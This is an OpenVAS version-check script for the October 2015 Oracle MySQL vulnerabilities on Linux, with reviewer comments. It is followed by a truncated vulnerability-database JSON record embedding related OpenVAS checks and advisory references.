Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)
2016-07-01T00:00:00
ID OPENVAS:1361412562310107018 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2020-04-01T00:00:00
Description
This host is running Oracle MySQL and is
prone to multiple unspecified vulnerabilities.
##############################################################################
# OpenVAS Vulnerability Test
#
# Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)
#
# Authors:
# Tameem Eissa <tameem.eissa@greenbone.net>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
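# Metadata block: runs only when the scanner loads the script in description
# mode. It registers identifiers, scoring, report text and scheduling
# constraints, then exits before any detection logic runs.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.107018");
  script_version("2020-04-01T10:41:43+0000");
  script_cve_id("CVE-2015-4913", "CVE-2015-4830", "CVE-2015-4826", "CVE-2015-4815",
                "CVE-2015-4807", "CVE-2015-4802", "CVE-2015-4792", "CVE-2015-4870",
                "CVE-2015-4861", "CVE-2015-4858", "CVE-2015-4836");
  script_bugtraq_id(77153, 77228, 77237, 77222, 77205, 77165, 77171, 77208, 77137,
                    77145, 77190);
  script_tag(name:"cvss_base", value:"4.0");
  # NOTE(review): this vector scores a partial integrity impact only (I:P),
  # while the "impact" tag below names confidentiality, integrity and
  # availability. Confirm the vector against the referenced Oracle advisory.
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:S/C:N/I:P/A:N");
  script_tag(name:"last_modification", value:"2020-04-01 10:41:43 +0000 (Wed, 01 Apr 2020)");
  script_tag(name:"creation_date", value:"2016-07-01 12:46:24 +0530 (Fri, 01 Jul 2016)");
  # remote_banner_unreliable: the verdict rests on the remotely reported
  # version string alone. Distribution packages that backport fixes without
  # changing that string can be flagged, so verify the patch level on the host
  # before treating a finding as confirmed.
  script_tag(name:"qod_type", value:"remote_banner_unreliable");
  script_name("Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)");

  script_tag(name:"summary", value:"This host is running Oracle MySQL and is
  prone to multiple unspecified vulnerabilities.");

  script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");

  script_tag(name:"insight", value:"Unspecified errors exists in the MySQL Server
  component via unknown vectors related to Server.");

  script_tag(name:"impact", value:"Successful exploitation will allow an
  authenticated remote attacker to affect confidentiality, integrity, and
  availability via unknown vectors.");

  # Fixed: this is the Linux variant of the check (see script_name and the
  # Host/runs_unixoide key below); the text previously said "on windows".
  script_tag(name:"affected", value:"Oracle MySQL Server 5.5.45 and earlier
  and 5.6.26 and earlier on Linux");

  script_tag(name:"solution", value:"Apply the patch from the referenced advisory.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_xref(name:"URL", value:"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html");

  script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
  # ACT_GATHER_INFO: the check reads already-collected detection data only.
  script_category(ACT_GATHER_INFO);
  script_family("Databases");
  # Detection scripts that must run first to supply the MySQL version and the
  # operating system guess consumed by the keys below.
  script_dependencies("mysql_version.nasl", "os_detection.nasl");
  script_require_ports("Services/mysql", 3306);
  # Run only where MySQL was detected and the host was classified as Unix-like.
  script_mandatory_keys("MySQL/installed", "Host/runs_unixoide");

  exit(0);
}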
include("version_func.inc");
include("host_details.inc");
# Version check for the October 2015 MySQL server issues.
# Flow: find a detected MySQL service, read its recorded version, and report
# when that version lies in the affected 5.5.x / 5.6.x ranges.
# exit(0) leaves the script without a verdict; exit(99) is the scanner's
# "checked, not affected" result.

# The product may be recorded under either vendor name.
cpe_list = make_list("cpe:/a:mysql:mysql", "cpe:/a:oracle:mysql");

# No detected MySQL service: nothing to evaluate.
infos = get_app_port_from_list(cpe_list:cpe_list);
if(!infos)
  exit(0);

cpe  = infos["cpe"];
port = infos["port"];

# exit_no_version:TRUE is passed so the lookup handles a missing version itself;
# the guard below covers an empty result.
infos = get_app_version_and_location(cpe:cpe, port:port, exit_no_version:TRUE);
if(!infos)
  exit(0);

vers = infos["version"];
path = infos["location"];

# Only the 5.5 and 5.6 release branches are in scope.
if(vers !~ "^5\.[56]\.")
  exit(99);

# Inside a covered branch but newer than the last affected release.
if(!version_in_range(version:vers, test_version:"5.5", test_version2:"5.5.45") &&
   !version_in_range(version:vers, test_version:"5.6", test_version2:"5.6.26"))
  exit(99);

# Affected by version number alone; no patch-level probe is performed here,
# so the report points the operator at the vendor patch.
report = report_fixed_ver(installed_version:vers, fixed_version:"Apply the patch", install_path:path);
security_message(data:report, port:port);
exit(0);
{"id": "OPENVAS:1361412562310107018", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)", "description": "This host is running Oracle MySQL and is\n prone to multiple unspecified vulnerabilities.", "published": "2016-07-01T00:00:00", "modified": "2020-04-01T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107018", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"], "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "lastseen": "2020-04-03T18:54:23", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2015:2244-1", "OPENSUSE-SU-2015:2246-1", "OPENSUSE-SU-2015:2243-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842503", "OPENVAS:703385", "OPENVAS:1361412562310703377", "OPENVAS:1361412562311220161011", "OPENVAS:1361412562310131134", "OPENVAS:1361412562310703385", "OPENVAS:1361412562310805764", "OPENVAS:1361412562310851142", "OPENVAS:1361412562310851139", "OPENVAS:703377"]}, {"type": "freebsd", "idList": ["851A0EEA-88AA-11E5-90E7-B499BAEBFEAF"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_851A0EEA88AA11E590E7B499BAEBFEAF.NASL", "OPENSUSE-2015-890.NASL", "MYSQL_5_5_46_RPM.NASL", "DEBIAN_DSA-3377.NASL", "MARIADB_10_0_22.NASL", "OPENSUSE-2016-164.NASL", "SUSE_SU-2016-0296-1.NASL", "MARIADB_5_5_46.NASL", "SUSE_SU-2016-0121-1.NASL", "OPENSUSE-2015-884.NASL"]}, {"type": "archlinux", "idList": ["ASA-201510-26"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3377-1:D5B01", "DEBIAN:DSA-3385-1:73003"]}, {"type": "cve", "idList": ["CVE-2015-4792", "CVE-2015-4830", "CVE-2015-4807", "CVE-2015-4858", "CVE-2015-4815", 
"CVE-2015-4802", "CVE-2015-4861", "CVE-2015-4826", "CVE-2015-4870", "CVE-2015-4836"]}, {"type": "f5", "idList": ["SOL59010802", "F5:K86326526", "F5:K59010802", "SOL86326526"]}, {"type": "symantec", "idList": ["SMNTC-1341"]}, {"type": "ubuntu", "idList": ["USN-2781-1"]}, {"type": "redhat", "idList": ["RHSA-2016:22610", "RHSA-2016:0705", "RHSA-2016:1132", "RHSA-2016:0534", "RHSA-2016:1481", "RHSA-2016:1480"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0534"]}, {"type": "centos", "idList": ["CESA-2016:0534"]}, {"type": "fedora", "idList": ["FEDORA:B323460B0848", "FEDORA:0994E61361B1", "FEDORA:2C4E6617FD66", "FEDORA:9EA6660762B4"]}, {"type": "amazon", "idList": ["ALAS-2016-684"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4856CE5DA621AD64273C51D5420971CA"]}, {"type": "exploitdb", "idList": ["EDB-ID:39867"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:137232"]}, {"type": "zdt", "idList": ["1337DAY-ID-26031"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14755"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015-2367953", "ORACLE:CPUOCT2015"]}], "modified": "2020-04-03T18:54:23", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-04-03T18:54:23", "rev": 2}, "vulnersScore": 6.4}, "pluginID": "1361412562310107018", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107018\");\n script_version(\"2020-04-01T10:41:43+0000\");\n script_cve_id(\"CVE-2015-4913\", \"CVE-2015-4830\", \"CVE-2015-4826\", \"CVE-2015-4815\",\n \"CVE-2015-4807\", \"CVE-2015-4802\", \"CVE-2015-4792\", \"CVE-2015-4870\",\n \"CVE-2015-4861\", \"CVE-2015-4858\", \"CVE-2015-4836\");\n script_bugtraq_id(77153, 77228, 77237, 77222, 77205, 77165, 77171, 77208, 77137,\n 77145, 77190);\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-01 10:41:43 +0000 (Wed, 01 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-01 12:46:24 +0530 (Fri, 01 Jul 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle MySQL and is\n prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Unspecified errors exists in the MySQL Server\n component via unknown vectors related to Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n authenticated remote attacker to affect confidentiality, integrity, and\n availability via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle MySQL Server 5.5.45 and earlier\n and 5.6.26 and earlier on windows\");\n\n 
script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list( \"cpe:/a:mysql:mysql\", \"cpe:/a:oracle:mysql\" );\n\nif(!infos = get_app_port_from_list(cpe_list:cpe_list))\n exit(0);\n\ncpe = infos[\"cpe\"];\nport = infos[\"port\"];\n\nif(!infos = get_app_version_and_location(cpe:cpe, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(vers =~ \"^5\\.[56]\\.\")\n{\n if(version_in_range(version:vers, test_version:\"5.5\", test_version2:\"5.5.45\") ||\n version_in_range(version:vers, test_version:\"5.6\", test_version2:\"5.6.26\"))\n {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"Apply the patch\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Databases"}
{"freebsd": [{"lastseen": "2019-05-29T18:32:59", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "\nOracle reports:\n\nCritical Patch Update: MySQL Server, version(s) 5.5.45 and prior, 5.6.26 and prior\n\n", "edition": 4, "modified": "2015-11-10T00:00:00", "published": "2015-11-10T00:00:00", "id": "851A0EEA-88AA-11E5-90E7-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/851a0eea-88aa-11e5-90e7-b499baebfeaf.html", "title": "MySQL - Multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2020-01-31T18:37:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-12-11T00:00:00", "id": "OPENVAS:1361412562310851139", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851139", "type": "openvas", "title": "openSUSE: Security Advisory for Security (openSUSE-SU-2015:2244-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851139\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-12-11 05:48:10 +0100 (Fri, 11 Dec 2015)\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\",\n \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\",\n \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Security (openSUSE-SU-2015:2244-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Security'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MariaDB was updated to 10.0.22 to fix security issues and bugs.\n\n The following vulnerabilities were fixed in the upstream release:\n\n CVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\n CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n A list of upstream changes and release notes can be found at the referenced notes.\n\n The following build problems were fixed:\n\n * bsc#937787: fix main.bootstrap test (change default charset to utf8 in\n test result)\");\n\n 
script_tag(name:\"affected\", value:\"Security on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:2244-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n\n script_xref(name:\"URL\", value:\"https://kb.askmonty.org/en/mariadb-10022-release-notes/\");\n script_xref(name:\"URL\", value:\"https://kb.askmonty.org/en/mariadb-10022-changelog/\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient-devel\", rpm:\"libmysqlclient-devel~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18\", rpm:\"libmysqlclient18~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo\", rpm:\"libmysqlclient18-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18\", rpm:\"libmysqlclient_r18~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld-devel\", rpm:\"libmysqld-devel~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18\", rpm:\"libmysqld18~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18-debuginfo\", rpm:\"libmysqld18-debuginfo~10.0.22~2.18.1\", 
rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench-debuginfo\", rpm:\"mariadb-bench-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client\", rpm:\"mariadb-client~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client-debuginfo\", rpm:\"mariadb-client-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debuginfo\", rpm:\"mariadb-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debugsource\", rpm:\"mariadb-debugsource~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-errormessages\", rpm:\"mariadb-errormessages~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test-debuginfo\", rpm:\"mariadb-test-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools\", rpm:\"mariadb-tools~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools-debuginfo\", rpm:\"mariadb-tools-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-32bit\", rpm:\"libmysqlclient18-32bit~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"libmysqlclient18-debuginfo-32bit\", rpm:\"libmysqlclient18-debuginfo-32bit~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18-32bit\", rpm:\"libmysqlclient_r18-32bit~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-04-03T18:54:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "This host is running Oracle MySQL and is\n prone to multiple unspecified vulnerabilities.", "modified": "2020-04-01T00:00:00", "published": "2015-10-28T00:00:00", "id": "OPENVAS:1361412562310805764", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805764", "type": "openvas", "title": "Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Windows)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805764\");\n script_version(\"2020-04-01T10:41:43+0000\");\n script_cve_id(\"CVE-2015-4913\", \"CVE-2015-4830\", \"CVE-2015-4826\", \"CVE-2015-4815\",\n \"CVE-2015-4807\", \"CVE-2015-4802\", \"CVE-2015-4792\", \"CVE-2015-4870\",\n \"CVE-2015-4861\", \"CVE-2015-4858\", \"CVE-2015-4836\");\n script_bugtraq_id(77153, 77228, 77237, 77222, 77205, 77165, 77171, 77208, 77137,\n 77145, 77190);\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-01 10:41:43 +0000 (Wed, 01 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-28 13:07:06 +0530 (Wed, 28 Oct 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle MySQL and is\n prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Unspecified errors exists in the MySQL Server\n component via unknown vectors related to Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n authenticated remote attacker to affect confidentiality, integrity, and\n availability via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle MySQL Server 5.5.45 and earlier\n and 5.6.26 and earlier on windows\");\n\n script_tag(name:\"solution\", 
value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list( \"cpe:/a:mysql:mysql\", \"cpe:/a:oracle:mysql\" );\n\nif(!infos = get_app_port_from_list(cpe_list:cpe_list))\n exit(0);\n\ncpe = infos[\"cpe\"];\nport = infos[\"port\"];\n\nif(!infos = get_app_version_and_location(cpe:cpe, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(vers =~ \"^5\\.[56]\\.\")\n{\n if(version_in_range(version:vers, test_version:\"5.5\", test_version2:\"5.5.45\") ||\n version_in_range(version:vers, test_version:\"5.6\", test_version2:\"5.6.26\"))\n {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"Apply the patch\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-01-31T18:37:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-12-11T00:00:00", "id": "OPENVAS:1361412562310851142", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851142", "type": "openvas", "title": 
"openSUSE: Security Advisory for Security (openSUSE-SU-2015:2246-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851142\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-12-11 05:51:25 +0100 (Fri, 11 Dec 2015)\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\",\n \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\",\n \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Security (openSUSE-SU-2015:2246-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Security'\n package(s) announced via the referenced advisory.\");\n\n 
